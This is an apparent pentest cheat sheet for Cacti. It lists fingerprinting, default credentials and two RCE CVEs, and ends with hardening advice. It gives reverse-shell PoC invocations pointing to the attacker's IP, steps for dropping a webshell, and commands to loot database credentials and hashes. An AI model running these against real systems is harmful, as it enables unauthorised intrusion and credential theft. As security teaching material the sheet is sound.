Cacti
PHP network-graphing app on 80. A long history of severe bugs: unauthenticated command injection (CVE-2022-46169) and authenticated graph-based RCE (CVE-2025-24367). The config holds the DB creds.
Ports
| Port | Proto | Notes |
|---|---|---|
80 | tcp | Cacti web UI (often /cacti) |
Fingerprint
- Login page shows 'Version 1.2.x', 'Cacti' branding
- Path /cacti/ or a cacti.* vhost
Key files
| Path | Holds | Sensitive |
|---|---|---|
include/config.php | MySQL database name, user and password | sensitive |
Default / weak creds
admin / admin default on fresh installs
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2022-46169 | Unauthenticated command injection via remote_agent.php |
| CVE-2025-24367 | Authenticated RCE — writes arbitrary PHP via the graph-creation feature |
Exploitation primitives
- CVE-2022-46169: spoof X-Forwarded-For to a host in the poller, inject into the 'action=polldata' parameter for unauth RCE
- CVE-2025-24367: as any logged-in user, abuse graph creation to drop a PHP webshell in the web root
- Read include/config.php for the MySQL creds, then dig the user_auth table for hashes
Overview
Cacti is a PHP graphing front-end for RRDtool on 80. Always read the version on the login page — it maps straight to a known RCE.
Unauthenticated RCE (CVE-2022-46169)
Inject through remote_agent.php (needs a valid poller hostname in X-Forwarded-For):
python3 CVE-2022-46169.py -u http://<TARGET>/cacti --LHOST=<YOUR_IP> --LPORT=4444Authenticated RCE (CVE-2025-24367)
With any low-priv login, the public PoC writes a PHP shell via graph creation:
python3 exploitcacti.py -u marcus -p wonderful1 -i <YOUR_IP> -l 4444 -url http://<TARGET>Loot the DB creds
cat include/config.php | grep database_Hardening
Patch to the latest 1.2.x, change admin/admin, restrict who can create graphs/templates, and lock down remote_agent.php to known pollers.